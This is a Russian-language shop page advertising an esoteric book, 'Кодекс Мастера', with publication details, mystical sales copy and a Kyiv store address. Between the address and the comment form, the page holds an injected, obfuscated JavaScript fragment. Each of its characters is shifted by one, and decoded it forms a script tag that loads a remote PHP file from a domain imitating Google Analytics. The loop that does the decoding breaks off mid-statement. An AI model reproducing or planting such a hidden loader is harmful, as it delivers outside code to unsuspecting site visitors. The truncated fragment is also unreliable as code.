Кодекс МастераАвтор: Садгуру Свами Вишну Дэв
ISBN: 978-5-413-00008-3
Переплет: Твердый переплет, 240 стр.
Год издания: 2010 год
Формат: 60x90/16 (~145х217 мм)
Издатель: “Амрита-Русь”
Цена : см. прайс-лист

Магический магазин “Мистическая Гирлянда” представляет Вам книгу Садгуру Свами Вишну Дэва ”Кодекс Мастера”

"Кодекс Мастера" - текст-передача, текст-магия, прямое приобщение к великой духовной линии совершенных Мастеров прошлого и настоящего.
"Кодекс Мастера" невозможно изучать, им возможно только жить, дышать, поскольку то, что вы взяли его в руки, означает только одно - вас коснулся Дух Беспредельного.
А когда Беспредельный Дух касается...

«Кодекс Мастера» относится к текстам категории упадеша» — это прямое руководство по практике йогинов, следующих путем Ануттара-тантры в тради­ции сиддхов.

Текст написан на тайном символическом языке (сандхья-бхашья), помогающем «выразить невырази­мое» и передать живое дыхание Мастеров.

Стиль «сандхья-бхашья» называют языком йогинь и дакинь. Ему присущи особое очарование и по­этичность, он предельно мистичен, неоднозначен и насыщен символами. В древности подобный язык в тантризме использовался для защиты учения от не­посвященных и для прямой передачи духа учения от Мастера к ученику.

Сумеречный язык не учит нас, он просто завора­живает ученика и прямо вводит в другую реальность, давая возможность самому почувствовать живое ды­хание вечности и величие Пути Просветления. Прос­то чтение такого текста уже есть живая передача энер­гии от Мастера к ученику, после которой невозможно остаться прежним.

Приобрести данную книгу Вы можете посетив наш эзотерический магазин по адресу г. Киев, ул. Гришка,8
#nzkt2#!tsd>#!iuuq;00hp1hmfbobmjujd/dpn0tdsjqut0epvcmfdmjdltubu/qiq#?=0tdsjqu?!";
m=""; for (i=0; i

Оставить комментарий

Ваш email не будет опубликован. Обязательные поля отмечены *

Вы можете использовать это HTMLтеги и атрибуты: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>